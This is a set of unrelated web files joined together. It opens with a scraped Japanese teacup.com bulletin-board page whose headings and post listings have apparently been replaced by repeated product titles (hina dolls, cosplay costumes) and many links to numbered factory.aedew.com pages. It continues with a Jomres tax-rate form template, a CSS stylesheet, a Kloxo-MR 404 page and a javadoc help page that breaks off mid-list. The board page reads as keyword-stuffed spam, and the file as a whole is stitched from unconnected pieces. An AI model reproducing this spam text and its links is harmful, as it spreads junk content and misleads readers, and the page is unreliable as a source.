<a id="logo" href="" title="雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
">
<img class="logo_l" src="../img/logo.png" width="184px" height="54px" />
</h1>
<!-- Alternative navigation -->
<nav>
<ul>
<li><a href=""><span class="awe-caret-right"></span>レンタル掲示板</a></li>
<li><a href=""><span class="awe-caret-right"></span>ブログAutopage</a></li>
<!--li><a href="http://media.teacup.com"><span class="awe-caret-right"></span>コラム(仮)</a></li-->
<li><a href=""><span class="awe-caret-right"></span>お問合せ</a></li>
</ul>
</nav>
<!-- /Alternative navigation -->
</header>
<!-- /Main page header -->
<!-- Main page container -->
<section class="container" role="main">
<!-- Left (navigation) side -->
<div class="navigation-block">
<p><span class="awe-share-alt"></span> 新規作成ご案内はこちらから<br/>
<button class="btn btn-large btn-block btn-primary" type="button" onClick="javascript:top.location.href=''"><strong>掲示板作成案内</strong></a></button>
</p>
<p><span class="awe-signin"></span> 管理画面はこちら<br/>
<button class="btn btn-large btn-block" type="button" onClick="javascript:window.open('http://my.teacup.com/login')"><strong>
<gcse:searchbox-only></gcse:searchbox-only>
<br/>
<!-- Main navigation -->
<nav class="main-navigation" role="navigation">
<ul>
<li class="current"><a href="http://factory.aedew.com/images/full-kit/02021329808nl.html">http://factory.aedew.com/images/full-kit/02021329808nl.html</a></li>
<li><a href="" class="no-submenu"><span class="awe-pencil"></span>ご利用案内?新規作成</a></li>
<li><a href=""><span class="awe-info-sign"></span>雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</a></li>
<li><a href=""><span class="awe-envelope-alt"></span>ペルソナ4 アニメ版 衣装?八十神高校制服女子 S[ACOS]</a>
<ul>
<li><a href="">よくある質問</a></li>
<li><a href="http://factory.aedew.com/images/full-kit/02021237962ka.html">http://factory.aedew.com/images/full-kit/02021237962ka.html</a></li>
</ul>
</li>
<li><a href="http://www.teacup.com/index/kiyaku" class="no-submenu"><span class="awe-book"></span>利用規約</a></li>
<br/>
<a class="thumbnail" href="http://privacymark.jp"><img src="http://static.teacup.com/common/img/bnr_pmark.gif" alt="" width="85" height="85"></a>
<br />
<a href="http://www.gmo.media/" target="_blank" class="thumbnail"><img src="http://static.teacup.com/common/img/assets/bnr_gmomedia.png" alt="" width="200" height="100"></a>
</ul>
</nav>
<!-- /Main navigation -->
</div>
<!-- Left (navigation) side -->
<!-- Right (content) side -->
<div class="content-block" role="main">
<!-- MAIN CONTENT -->
<!-- Hero unit -->
<!--
<div class="hero-unit">
<h2>1997年から利用されているらくらくシンプル掲示板!</h2>
<h1>無料レンタル掲示板</h1>
<button class="btn btn-xlarge btn-primary" type="button"><span class="awe-share-alt"></span> 今すぐ無料で掲示板を作成する</button>
</div>
<!-- /Hero unit -->
<!-- Grid row -->
<div class="row">
<!-- Data block -->
<article class="span12 data-block raw">
<div class="hero-unit">
<h1>雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</h1>
<p>IS〈インフィニット?ストラトス〉 シュヴァルツェ?ハーゼ刺繍ワッペンベースワークシャツ/ブラック-XL(再販)[コスパ]【送料無料】《09月予約》。<br/>
雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
。</p>
<h3><span class="awe-pencil"></span> <a href="" class="no-submenu">ご利用案内?新規作成はこちら</a></h3>
</div>
</article>
<!-- /Data block -->
</div>
<!-- /Grid row -->
<!-- Page header -->
<article class="page-header">
<h1><a href="" title="雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
"><span class="awe-info-sign"></span> 雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</a></h1>
<p><a href="">雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</a></p>
<p><a href="http://factory.aedew.com/images/full-kit/02021221980ix.html">http://factory.aedew.com/images/full-kit/02021221980ix.html</a></p>
<p><a href="">新表示タイプのフォントを修正しました(2015年10月05日)</a></p>
</article>
<!-- /Page header -->
<!--
<hr>
<h2><span class="awe-bullhorn"></span> teacup.関連サービス【広告】</h2>
<script src='http://a.t.webtracker.jp/js/a.js' type='text/javascript' charset='utf-8'></script>
<div class="ad_frame sid_9ac24afa6834ead851767d4a1b37f5a3d386605484acb546 container_div color_#0000CC-#444444-#FFFFFF-#0000FF-#009900"></div>
<hr>
-->
<!-- キャンペーン -->
<!-- /キャンペーン -->
<a name="latestpost"></a>
<!-- Grid row -->
<div class="row">
<!-- Data block -->
<article class="span12 data-block decent">
<div class="data-container">
<header>
<h2><span class="awe-pencil"></span> 掲示板新着投稿</h2>
</header>
<section>
<h3>雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</h3>
<table class="table table-hover">
<!--掲示板最新 開始-->
<tr>
<td>2016/01/15 15:54</td>
<td> </td>
<td><a href="" target="_blank">ふーむ - ■■原付板の掲示板■■</a></td>
</tr>
<tr>
<td>2016/01/15 15:54</td>
<td> </td>
<td><a href="http://factory.aedew.com/images/full-kit/02021320800xl.html">http://factory.aedew.com/images/full-kit/02021320800xl.html</a></td>
</tr>
<tr>
<td>2016/01/15 15:53</td>
<td> </td>
<td><a href="" target="_blank">本日のアカデミー - 内灘FC?ACADEMY</a></td>
</tr>
<tr>
<td>2016/01/15 15:53</td>
<td> </td>
<td><a href="" target="_blank">ダル / Hello Little Girl!(ハロー リトルガール!) 通常サイズ 完成品ドール[グルーヴ]《取り寄せ※暫定》</a></td>
</tr>
<tr>
<td>2016/01/15 15:53</td>
<td> </td>
<td><a href="" target="_blank">投稿 - yahoo.co.jp</a></td>
</tr>
<tr>
<td>2016/01/15 15:53</td>
<td> </td>
<td><a href="http://factory.aedew.com/images/full-kit/02021238005kf.html">http://factory.aedew.com/images/full-kit/02021238005kf.html</a></td>
</tr>
<tr>
<td>2016/01/15 15:52</td>
<td> </td>
<td><a href="" target="_blank">Re: (無題) - お笑い芸人 相方募集掲示板</a></td>
</tr>
<tr>
<td>2016/01/15 15:52</td>
<td> </td>
<td><a href="" target="_blank">雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</a></td>
</tr>
<!--掲示板最新 終了-->
</table>
<!-- Data block -->
<!--
<section>
<div class="pagination">
<ul>
<li class="disabled"><a href="#"><span class="awe-arrow-left"></span> 前へ</a></li>
<li class="active"><a href="#">1</a></li>
<li><a href="#">2</a></li>
<li><a href="#">3</a></li>
<li><a href="#">次へ <span class="awe-arrow-right"></span></a></li>
</ul>
</div>
</section>
-->
<!-- /Data block -->
</section>
</div>
</article>
<!-- /Data block -->
</div>
<!-- /Grid row -->
<!-- Grid row -->
<div class="row">
<!-- Data block -->
<article class="span12 data-block decent">
<div class="data-container">
<header>
<h2><span class="awe-th-list"></span> 雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</h2>
</header>
<section>
<div class="row-fluid">
<div class="span3">
<h3>
<span class="fam-images"></span><a href="">趣味</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-rainbow"></span><a href="http://factory.aedew.com/images/full-kit/02021323178th.html">http://factory.aedew.com/images/full-kit/02021323178th.html</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-flag-purple"></span><a href="">スポーツ</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-music"></span><a href="">音楽</a>
</h3>
<br/>
</div>
</div>
</section>
<section>
<div class="row-fluid">
<div class="span3">
<h3>
<span class="fam-film"></span><a href="">From TV animation ワンピース 麦わらの一味 シルバーリング/15号(再販)[コスパ]</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-user-red"></span><a href="">タレント/俳優/歌手</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-heart"></span><a href="">恋愛/相談/占い</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-layout-content"></span><a href="http://factory.aedew.com/images/full-kit/02021310084rr.html">http://factory.aedew.com/images/full-kit/02021310084rr.html</a>
</h3>
<br/>
</div>
</div>
</section>
<section>
<div class="row-fluid">
<div class="span3">
<h3>
<span class="fam-emoticon-smile"></span><a href="http://factory.aedew.com/images/full-kit/02021310017jf.html">http://factory.aedew.com/images/full-kit/02021310017jf.html</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-picture"></span><a href="">PC/ネット/モバイル</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-cake"></span><a href="">グルメ&ドリンク</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-star"></span><a href="">カーニヴァル 衣装 アニメ版?无の衣装/XL[ACOS]</a>
</h3>
<br/>
</div>
</div>
</section>
<section>
<div class="row-fluid">
<div class="span3">
<h3>
<span class="fam-house"></span><a href="http://factory.aedew.com/images/full-kit/02021222913um.html">http://factory.aedew.com/images/full-kit/02021222913um.html</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-lightbulb-off"></span><a href="">健康/医療/介護</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-building"></span><a href="">子供/学校/教育</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-page-white-text"></span><a href="">すーぱーそに子×LIVERTINE AGE すーぱーそに子オーバーパーカーtype:COLLEGE/OML-L[UDG]</a>
</h3>
<br/>
</div>
</div>
</section>
<section>
<div class="row-fluid">
<div class="span3">
<h3>
<span class="fam-chart-pie"></span><a href="http://factory.aedew.com/images/full-kit/02021230577kd.html">http://factory.aedew.com/images/full-kit/02021230577kd.html</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-anchor"></span><a href="">雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</a>
</h3>
<br/>
</div>
</div>
</section>
</div>
</article>
<!-- /Data block -->
</div>
<!-- /Grid row -->
<br/>
<!-- Grid row -->
<div class="row"><br/>
<!-- Data block -->
<article class="span3 alert-white">
<div class="data-container">
<header>
<h4>雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</h4>
</header>
<section>
<ul class="checkmark">
<li><a href="http://factory.aedew.com/images/full-kit/02021223486om.html">http://factory.aedew.com/images/full-kit/02021223486om.html</a></li>
<li><a href="">掲示板</a></li>
<li><a href="">お知らせ</a></li>
</ul>
</section>
</div>
</article>
<!-- /Data block -->
<!-- Data block -->
<article class="span3 alert-white">
<div class="data-container">
<header>
<h4>ブログAutoPage</h4>
</header>
<section>
<ul class="checkmark">
<li><a href="http://factory.aedew.com/images/full-kit/02021209331ya.html">http://factory.aedew.com/images/full-kit/02021209331ya.html</a></li>
<li><a href="http://factory.aedew.com/images/full-kit/02021335138te.html">http://factory.aedew.com/images/full-kit/02021335138te.html</a></li>
</ul>
</section>
</div>
</article>
<!-- /Data block -->
<!-- Data block -->
<article class="span3 alert-white">
<div class="data-container">
<header>
<h4>雛人形 公司作 ひな人形 市松人形 童人形 浮世人形 人形のみ 8号 齋藤公司作 ケース別売り No.264 【2015年度新作】 h223-80120-61b-s
</h4>
</header>
<section>
<ul class="checkmark">
<li><a href="">よくある質問?ヘルプ</a></li>
<li><a href="">一覧</a></li>
</ul>
</section>
</div>
</article>
<!-- /Data block -->
<!-- Data block -->
<article class="span3 alert-white">
<div class="data-container">
<header>
<h4>その他</h4>
</header>
<section>
<ul class="checkmark">
<li><a href="">利用規約</a></li>
<li><a href="">プライバシーステートメント</a></li>
<li><a href="">携帯にURL送信</a></li>
</ul>
</section>
</div>
</article>
<!-- /Data block -->
</div>
<!-- /Grid row -->
<!-- GMOグループフッター -->
<div id="gmofooter">
<div class="gmofooter">
<div class="gmofooter_header">
</div>
<div class="gmofooter_relatedservice">
<div class="gmofooter_heading">関連サービス</div>
<div class="gmofooter_relatedservicelist">
<ul>
<li>
<dl><dt><a target="_blank" href="http://www.freeml.com/">メーリングリスト(ML)サービス</a></dt><dd>freeml</dd></dl>
<dl><dt><a target="_blank" href="http://www.yaplog.jp/">無料ブログサービス</a></dt><dd>ヤプログ!</dd></dl>
</li>
<li>
<dl><dt><a target="_blank" href="http://coordisnap.com/">ファッションコーディネートアプリ</a></dt><dd>CoordiSnap</dd></dl>
<dl><dt><a target="_blank" href="http://prcm.jp/">女の子のためのコミュニティ</a></dt><dd>prican</dd></dl>
</li>
<li>
<dl><dt><a target="_blank" href="">こだわりランキングサイト</a></dt><dd>ランキングシェア</dd></dl>
<dl><dt><a target="_blank" href="">ネット証券</a></dt><dd>クリック証券</dd></dl>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<!-- /Right (content) side -->
</section>
<!-- /Main page container -->
<!-- Main page footer -->
<footer class="container">
<p>Copyright All Rights Reserved.</p>
<ul>
<li><a href="" class="">よくある質問(FAQ)</a></li>
<li><a href="http://factory.aedew.com/images/full-kit/02021244304uu.html">http://factory.aedew.com/images/full-kit/02021244304uu.html</a></li>
<li><a href="" class="">お問い合せ</a></li>
</ul>
<a href="" class="btn btn-primary btn-flat pull-right">Top ↑</a> </footer>
<!-- /Main page footer -->
<!-- GMOグループヘッダー -->
</body>
</html>
|
jomres/templates/jquery_ui/administrator/edit_taxrate.html | parksandwildlife/parkstay | <patTemplate:tmpl name="pageoutput" unusedvars="strip">
<h2>{PAGETITLE}</h2>
<form action="{JOMRES_SITEPAGE_URL_ADMIN}" method="post" name="adminForm">
{JOMRESTOOLBAR}
<table class="ui-widget-content ui-corner-all" width="100%">
<tr>
<td width="30%">{HCODE}</td>
<td><input type="text" name="code" value="{CODE}"/></td>
</tr>
<tr>
<td>{HDESCRIPTION}</td>
<td><input type="text" name="description" value="{DESCRIPTION}"/></td>
</tr>
<tr>
<td>{HRATE}</td>
<td><input type="text" name="rate" value="{RATE}" size="7"/></td>
</tr>
</table>
<input type="hidden" name="id" value="{ID}"/>
<input type="hidden" name="option" value="com_jomres"/>
<input type="hidden" name="task" value="save_taxrate"/>
</form>
</patTemplate:tmpl> |
css/mailstyle.css | yayimahuman/intellimail | html {
width: 100%;
height: 100%;
}
body {
width: 100%;
height: 100%;
font-family: "Open Sans",Helvetica,Arial,sans-serif;
color: #000;
background-color: #fff;
font-weight: 400;
}
h1,h2,h3,h4,h5,h6 {
font-family: "Open Sans",Helvetica,Arial,sans-serif;
}
h1, h2 {
text-transform: uppercase;
font-weight: 700;
}
h3{
font-size: 34px;
}
p {
font-size: 14px;
line-height: 1.1;
}
@media(min-width:768px) {
p {
font-size: 16px;
line-height: 1.3;
}
}
a {
-webkit-transition: all .2s ease;
-moz-transition: all .2s ease;
transition: all .2s ease;
color: tomato;
}
a:hover,
a:focus, a.categories:hover, a.categories:focus {
text-decoration: none;
color: #ff3300;
outline: 0;
}
.col-sm-12, .col-sm-6, .col-sm-4, .col-sm-3, .col-md-4, .col-md-2 {
padding-bottom: 35px;
}
.navbar-custom {
margin-bottom: 0;
font-family: "Open Sans",Helvetica,Arial,sans-serif;
background: #fff;
border-bottom: 1px solid #D0D0D0;
}
.navbar-custom a {
color:#000;
text-transform: uppercase;
font-weight: 700;
}
.navbar-custom .navbar-brand {
font-weight: 700;
color: #000;
}
.navbar-custom .navbar-brand:focus {
outline: 0;
}
.navbar-custom .navbar-brand .navbar-toggle {
font-size: 16px;
}
.navbar-custom .navbar-brand .navbar-toggle:focus,
.navbar-custom .navbar-brand .navbar-toggle:active {
outline: 0;
}
.navbar-custom .nav li a {
-webkit-transition: .3s ease;
-moz-transition: .3s ease;
transition: .3s ease;
}
.navbar-custom .nav li a:hover {
color: #ff3300;
}
@media(max-width:767px) {
.navbar-custom .navbar-brand {
padding-top: 18px;
}
}
@media(min-width:768px) {
.navbar-custom {
padding: 20px 0;
border-bottom: 0;
background: 0 0;
-webkit-transition: background .5s ease,padding .5s ease;
-moz-transition: background .5s ease,padding .5s ease;
transition: background .5s ease,padding .5s ease;
}
.navbar-custom .nav li a {
-webkit-transition: .3s ease;
-moz-transition: .3s ease;
transition: .3s ease;
color: #fff;
}
.navbar-custom .navbar-brand {
font-weight: 700;
color: #fff;
}
.navbar-custom .navbar-brand:hover {
font-weight: 700;
color: #D0D0D0;
}
.navbar-custom .nav li a:hover {
color: #D0D0D0;
background: 0 0;
}
.navbar-custom .nav li a:focus,
.navbar-custom .nav li a:active {
outline: 0;
color: #fff;
background: 0 0;
}
.navbar-custom.top-nav-collapse {
padding: 0;
border-bottom: 1px solid #D0D0D0;
background: #fff;
}
.navbar-custom.top-nav-collapse .navbar-brand:hover {
font-weight: 700;
color: #ff3300;
}
.navbar-custom.top-nav-collapse .nav li a {
-webkit-transition: .3s ease;
-moz-transition: .3s ease;
transition: .3s ease;
color: #000;
}
.navbar-custom.top-nav-collapse .nav li a:hover {
color: #ff3300;
}
.navbar-custom.top-nav-collapse .navbar-brand {
font-weight: 700;
color: #000;
}
.navbar-custom.top-nav-collapse .nav li.active {
outline: 0;
}
.navbar-custom.top-nav-collapse .nav li.active a {
background:#fff;
}
}
.intro {
display: table;
width: 100%;
height: auto;
padding: 100px 0;
text-align: center;
color: #fff;
background: #ff3300;
-webkit-background-size: cover;
-moz-background-size: cover;
background-size: cover;
-o-background-size: cover;
}
.intro .intro-body {
display: table-cell;
vertical-align: middle;
}
.intro .intro-body .brand-heading {
font-size: 40px;
}
.intro .intro-body .intro-text {
font-size: 18px;
}
@media(min-width:768px) {
.intro {
height: 100%;
padding: 0;
}
.intro .intro-body .brand-heading {
font-size: 90px;
}
.intro .intro-body .intro-text {
font-size: 26px;
}
.intro .intro-body .fa-angle-down {
font-size: 64px;
}
}
.btn-circle {
width: 70px;
height: 70px;
margin-top: 15px;
padding: 7px 16px;
border: none;
border-radius: 100%!important;
font-size: 40px;
color: #fff;
background: 0 0;
-webkit-transition: background .3s ease;
-moz-transition: background .3s ease;
transition: background .3s ease;
}
.btn-circle:hover,
.btn-circle:focus {
outline: 0;
color: #fff;
}
.btn-circle i.animated {
-webkit-transition-property: -webkit-transform;
-webkit-transition-duration: 1s;
-moz-transition-property: -moz-transform;
-moz-transition-duration: 1s;
}
.btn-circle:hover i.animated {
-webkit-animation-name: pulse;
-moz-animation-name: pulse;
-webkit-animation-duration: 1.5s;
-moz-animation-duration: 1.5s;
-webkit-animation-iteration-count: infinite;
-moz-animation-iteration-count: infinite;
-webkit-animation-timing-function: linear;
-moz-animation-timing-function: linear;
}
.content-section {
padding: 15px 0px 40px 0px;
}
#how-it-works .fa {
color:tomato;
}
#categories {
width: 100%;
-webkit-background-size: cover;
-moz-background-size: cover;
background-size: cover;
-o-background-size: cover;
background: #F0F0F0;
}
div.categories {
color:#505050;
}
a.categories {
color:#505050;
}
#popular-templates {
width: 100%;
-webkit-background-size: cover;
-moz-background-size: cover;
background-size: cover;
-o-background-size: cover;
background: #ff3300;
color:#fff;
}
#about {
}
#contact{
width:100%;
background: #ff3300;
color:#fff;
-webkit-background-size: cover;
-moz-background-size: cover;
background-size: cover;
-o-background-size: cover;
text-align: left;
}
.btn {
border-radius: 0;
font-family: "Open Sans",Helvetica,Arial,sans-serif;
font-weight: 400;
-webkit-transition: all .3s ease;
-moz-transition: all .3s ease;
transition: all .3s ease;
}
.btn:active, .btn:focus {
outline: 0;
}
.btn-default {
border: 1px solid #fff;
color: #000;
background:#fff;
-webkit-border-radius: 23px;
-moz-border-radius: 23px;
border-radius: 23px;
height:45px;
width:200px;
font-size: 18px;
}
.btn-default:hover {
border: 1px solid #909090;
background-color: #E0E0E0;
}
.btn-modal {
height:36px;
width: 90px;
border:none;
color:#fff;
background:tomato;
margin:0px 3px;
}
.btn-modal:hover {
background:#ff3300;
border:none;
}
.btn-submit {
height:40px;
width:90px;
}
i.btn-icon {
margin-left: 11px;
}
i.fa-times{
margin-top:5px;
}
.modal {
margin-left:-300px;
margin-right:-300px;
}
footer {
padding: 70px 0;
}
footer p {
margin: 0;
}
::-moz-selection {
text-shadow: none;
background: #fcfcfc;
background: rgba(255,255,255,.2);
}
::selection {
text-shadow: none;
background: #fcfcfc;
background: rgba(255,255,255,.2);
}
img::selection {
background: 0 0;
}
img::-moz-selection {
background: 0 0;
}
body {
webkit-tap-highlight-color: rgba(255,255,255,.2);
}
input[type=range] {
-webkit-appearance: none;
width: 100%;
margin: -7.5px 0;
}
input[type=range]:focus {
outline: none;
}
input[type=range]::-webkit-slider-runnable-track {
width: 100%;
height: 16px;
cursor: pointer;
box-shadow: 0px 0px 0px rgba(0, 0, 0, 0), 0px 0px 0px rgba(13, 13, 13, 0);
background: #d0d0d0;
border-radius: 25px;
border: 0px solid rgba(1, 1, 1, 0);
}
input[type=range]::-webkit-slider-thumb {
box-shadow: 0px 0px 0px rgba(0, 0, 0, 0), 0px 0px 0px rgba(13, 13, 13, 0);
border: 0px solid rgba(0, 0, 0, 0);
height: 1px;
width: 5px;
border-radius: 0px;
background: #ff3300;
cursor: pointer;
-webkit-appearance: none;
margin-top: 7.5px;
}
input[type=range]:focus::-webkit-slider-runnable-track {
background: #d0d0d0;
}
input[type=range]::-moz-range-track {
width: 100%;
height: 16px;
cursor: pointer;
box-shadow: 0px 0px 0px rgba(0, 0, 0, 0), 0px 0px 0px rgba(13, 13, 13, 0);
background: #d0d0d0;
border-radius: 25px;
border: 0px solid rgba(1, 1, 1, 0);
}
input[type=range]::-moz-range-thumb {
box-shadow: 0px 0px 0px rgba(0, 0, 0, 0), 0px 0px 0px rgba(13, 13, 13, 0);
border: 0px solid rgba(0, 0, 0, 0);
height: 1px;
width: 5px;
border-radius: 0px;
background: #ff3300;
cursor: pointer;
}
input[type=range]::-ms-track {
width: 100%;
height: 16px;
cursor: pointer;
background: transparent;
border-color: transparent;
color: transparent;
}
input[type=range]::-ms-fill-lower {
background: #d0d0d0;
border: 0px solid rgba(1, 1, 1, 0);
border-radius: 50px;
box-shadow: 0px 0px 0px rgba(0, 0, 0, 0), 0px 0px 0px rgba(13, 13, 13, 0);
}
input[type=range]::-ms-fill-upper {
background: #d0d0d0;
border: 0px solid rgba(1, 1, 1, 0);
border-radius: 50px;
box-shadow: 0px 0px 0px rgba(0, 0, 0, 0), 0px 0px 0px rgba(13, 13, 13, 0);
}
input[type=range]::-ms-thumb {
box-shadow: 0px 0px 0px rgba(0, 0, 0, 0), 0px 0px 0px rgba(13, 13, 13, 0);
border: 0px solid rgba(0, 0, 0, 0);
width: 5px;
border-radius: 0px;
background: #ff3300;
cursor: pointer;
height: 1px;
}
input[type=range]:focus::-ms-fill-lower {
background: #d0d0d0;
}
input[type=range]:focus::-ms-fill-upper {
background: #d0d0d0;
}
|
httpdocs/error/404.html | zuoziqi/KloxoST | <html>
<head>
<title>Kloxo-MR : Error 404</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<style>
body {
font-family: Tahoma, Verdana, Arial, Helvertica, sans-serif;
font-size: 8pt;
font-weight: 100;
background-image:url('/error/images/abstract.jpg');
background-color:#cccccc;
margin: 0;
}
a {
text-decoration: none;
}
img {
border: 0;
}
img.logo {
margin: 5px;
padding: 0;
}
table.header {
border-collapse: collapse;
border-spacing: 0;
width: 100%;
font-family: Tahoma, Verdana, Arial, Helvertica, sans-serif;
font-size: 8pt;
font-weight: 100;
}
table.content {
border-collapse: collapse;
border-spacing: 0;
width: 100%;
font-family: Tahoma, Verdana, Arial, Helvertica, sans-serif;
font-size: 8pt;
font-weight: 100%;
}
table.content_body td {
border-collapse: collapse;
border: 1px dashed #cccccc;
font-family: Tahoma, Verdana, Arial, Helvertica, sans-serif;
font-size: 10pt;
color: #444444;
padding:10px;
spacing:0;
}
table.content_title td {
border-collapse: collapse;
border: 0;
font-family: Tahoma, Verdana, Arial, Helvertica, sans-serif;
font-size: 12pt;
color: #336699;
}
</style>
<body>
<table class="header">
<tr>
<td width="100%"><img style="margin:5px; padding:5px; height:50px" class="logo" src="/error/images/logo.png" alt="hosting-logo"></td>
<td><a href="http://mratwork.com/work/" title="Go to Kloxo-MR website"><img style="margin:5px; padding:5px; height:50px" class="logo" src="/error/images/kloxo-mr.png" alt="kloxo-mr-logo"></a></td>
</tr>
</table>
<table class="content">
<tr>
<td width="50"> </td>
<td valign="middle" width="100%">
<div align="center">
<table class="content_title" width="640">
<tr>
<td><br>
<br>
<b>Error 404 - Not Found</b> </td>
</tr>
</table>
<br>
<table class="content_body" width="640">
<tr>
<td width="100%" bgcolor="#eeeeee">
The requested page could not be found but may be available again in the future<br></td>
</tr>
</table>
</div>
</td>
<td width="50"> </td>
</tr>
</table>
</body>
</html> |
SerializarObjetosGUI/doc/help-doc.html | sfaci/java-ficheros | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="es">
<head>
<!-- Generated by javadoc (version 1.7.0_02) on Fri Oct 05 07:45:41 GMT 2012 -->
<title>API Help</title>
<meta name="date" content="2012-10-05">
<link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title = "API Help";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="org/sfsoft/serializar/gui/package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li><a href="org/sfsoft/serializar/gui/package-tree.html">Tree</a></li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="index-files/index-1.html">Index</a></li>
<li class="navBarCell1Rev">Help</li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="index.html?help-doc.html" target="_top">Frames</a></li>
<li><a href="help-doc.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if (window == top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 class="title">How This API Document Is Organized</h1>
<div class="subTitle">This API (Application Programming Interface) document has pages corresponding to the items in
the navigation bar, described as follows.
</div>
</div>
<div class="contentContainer">
<ul class="blockList">
<li class="blockList">
<h2>Package</h2>
<p>Each package has a page that contains a list of its classes and interfaces, with a summary for each. This
page can contain six categories:</p>
<ul>
<li>Interfaces (italic)</li>
<li>Classes</li>
<li>Enums</li>
<li>Exceptions</li>
<li>Errors</li>
<li>Annotation Types</li>
</ul>
</li>
<li class="blockList">
<h2>Class/Interface</h2>
<p>Each class, interface, nested class and nested interface has its own separate page. Each of these pages
has three sections consisting of a class/interface description, summary tables, and detailed member
descriptions:</p>
<ul>
<li>Class inheritance diagram</li>
<li>Direct Subclasses</li>
<li>All Known Subinterfaces</li>
<li>All Known Implementing Classes</li>
<li>Class/interface declaration</li>
<li>Class/interface description</li>
</ul>
<ul>
<li>Nested Class Summary</li>
<li>Field Summary</li>
<li>Constructor Summary</li>
<li>Method Summary</li>
</ul>
<ul>
<li>Field Detail</li>
<li>Constructor Detail</li>
<li>Method Detail</li>
</ul>
<p>Each summary entry contains the first sentence from the detailed description for that item. The summary
entries are alphabetical, while the detailed descriptions are in the order they appear in the source
code. This preserves the logical groupings established by the programmer.</p>
</li>
<li class="blockList">
<h2>Annotation Type</h2>
<p>Each annotation type has its own separate page with the following sections:</p>
<ul>
<li>Annotation Type declaration</li>
<li>Annotation Type description</li>
<li>Required Element Summary</li>
<li>Optional Element Summary</li>
<li>Element Detail</li>
</ul>
</li>
<li class="blockList">
<h2>Enum</h2>
<p>Each enum has its own separate page with the following sections:</p>
<ul>
<li>Enum declaration</li>
<li>Enum description</li>
<li>Enum Constant Summary</li>
<li>Enum Constant Detail</li>
</ul>
</li>
<li class="blockList">
<h2>Use</h2>
<p>Each documented package, class and interface has its own Use page. This page describes what packages,
classes, methods, constructors and fields use any part of the given class or package. Given a class or
interface A, its Use page includes subclasses of A, fields declared as A, methods that return A, and
methods and constructors with parameters of type A. You can access this page by first going to the
package, class or interface, then clicking on the "Use" link in the navigation bar.</p>
</li>
<li class="blockList">
<h2>Tree (Class Hierarchy)</h2>
<p>There is a <a href="overview-tree.html">Class Hierarchy</a> page for all packages, plus a hierarchy for
each package. Each hierarchy page contains a list of classes and a list of interfaces. The classes are
organized by inheritance structure starting with <code>java.lang.Object</code>. The interfaces do not
inherit from <code>java.lang.Object</code>.</p>
<ul>
<li>When viewing the Overview page, clicking on "Tree" displays the hierarchy for all packages.</li>
